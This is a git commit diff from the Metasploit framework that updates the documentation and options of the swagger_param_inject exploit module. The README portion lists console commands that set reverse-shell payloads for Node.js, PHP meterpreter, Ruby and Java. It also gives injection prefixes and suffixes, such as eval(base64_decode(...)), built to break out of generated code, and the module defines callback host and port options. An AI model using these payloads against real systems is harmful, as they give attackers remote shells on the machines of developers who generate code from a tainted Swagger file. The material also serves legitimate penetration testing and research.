updated as per @egypt & @todb-r7 recommendations.

2016-06-23 11:41:54 -04:00 · 2016-06-23 11:41:54 -04:00 · fbd0bc4308
parent e9e4e7d069
commit fbd0bc4308
2 changed files with 5 additions and 58 deletions
--- a/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md
+++ b/documentation/modules/exploit/multi/fileformat/swagger_param_inject/README.md
@ -21,7 +21,7 @@ set LPORT 4444

 run 
 ```
-3. Pick a target
+3. Pick a target 

 ## Targets

@ -32,70 +32,18 @@ This attack looks to inject a payload into javascript by terminating a URL path
 [nodejs-codegen](nodejs-codegen.rc)

 ```
-set PAYLOAD nodejs/shell_reverse_tcp

+set PAYLOAD nodejs/shell_reverse_tcp
 use exploit/multi/fileformat/swagger_param_inject

 set INFO_VERSION "1.0.0"
 set PAYLOAD_LOC "PATH"
 set PAYLOAD_PREFIX "/a');};};return exports;}));"
 set PAYLOAD_SUFFIX "(function(){}(this,function(){a=function(){b=function(){new Array('"
-
+set SWAGGER_HOST "localhost"
 run 
 ```

-**PHP**
-
-This attack takes advantage of injection of variables into multiline comment area.
-
-[php-codegen](php-codegen.rc)
-
-```
-set PAYLOAD php/meterpreter/reverse_tcp 
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_PREFIX "*/ namespace foobar; eval(base64_decode('"
-set PAYLOAD_SUFFIX "')); /*"
-
-run 
-```
-
-
-**Ruby**
-
-This attack takes advantage of injection of variables into multiline comment area.
-
-[ruby-codegen](ruby-codegen.rc)
-
-```
-set PAYLOAD ruby/shell_reverse_tcp 
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_LOC "INFO_TITLE"
-set PAYLOAD_PREFIX "=end "
-set INFO_DESCRIPTION "=begin "
-
-run 
-```
-
-**Java**
-
-This attack looks to inject a payload into javascript by terminating a URL path string, and placing code inline without causing runtime errors.
-
-[java-codegen](java-codegen.rc)
-
-```
-set PAYLOAD java/jsp_shell_reverse_tcp 
-
-use exploit/multi/fileformat/swagger_param_inject
-
-set PAYLOAD_LOC "PATH"
-set PAYLOAD_PREFIX "a\\\"; "
-
-run 
-```

 ## Quick Test

--- a/modules/exploits/multi/fileformat/swagger_param_inject.rb
+++ b/modules/exploits/multi/fileformat/swagger_param_inject.rb
@ -50,15 +50,14 @@ class MetasploitModule < Msf::Exploit::Remote
      [
        OptAddress.new('LHOST', [true, 'Server IP or hostname that the swagger codegen will callback to.']),
        OptPort.new('LPORT', [true, 'Server port.']),
-        OptString.new('PAYLOAD', [false, 'Payload Injection']),
        OptString.new('PAYLOAD_PREFIX', [false, 'Payload Injection prefix', '']),
        OptString.new('PAYLOAD_SUFFIX', [false, 'Payload Injection suffix', '']),
-        OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point','INFO_DESCRIPTION']),
+        OptString.new('PAYLOAD_LOC', [false, 'Payload insertion point', 'INFO_DESCRIPTION', ['INFO_DESCRIPTION', 'INFO_VERSION', 'INFO_TITLE', 'SWAGGER_HOST', 'BASE_PATH', 'PATH', 'PATH_DESRIPTION', 'PATH_RESPONSE_DESCRIPTION', 'DEFINITION_DESCRIPTION'] ]),
        OptString.new('INFO_DESCRIPTION', [true, 'Swagger info description', 'A']),
        OptString.new('INFO_VERSION', [true, 'Swagger info version.', 'B']),
        OptString.new('INFO_TITLE', [true, 'Swagger info title.', 'C']),
        OptEnum.new('SWAGGER_SCHEME', [true, 'Protocol scheme', 'http', ['http','https','ws','wss']]),
-        OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4', 'X.Y.Z.xyz']),
+        OptString.new('SWAGGER_HOST', [true, 'a valid hostname or IPv4']),
        OptString.new('BASE_PATH', [true, 'The root path of API on host.', '/']),
        OptString.new('PATH', [true, 'Path of request/response on root path.', '/a']),
        OptString.new('PATH_DESCRIPTION', [true, 'Description of a path request object', 'D']),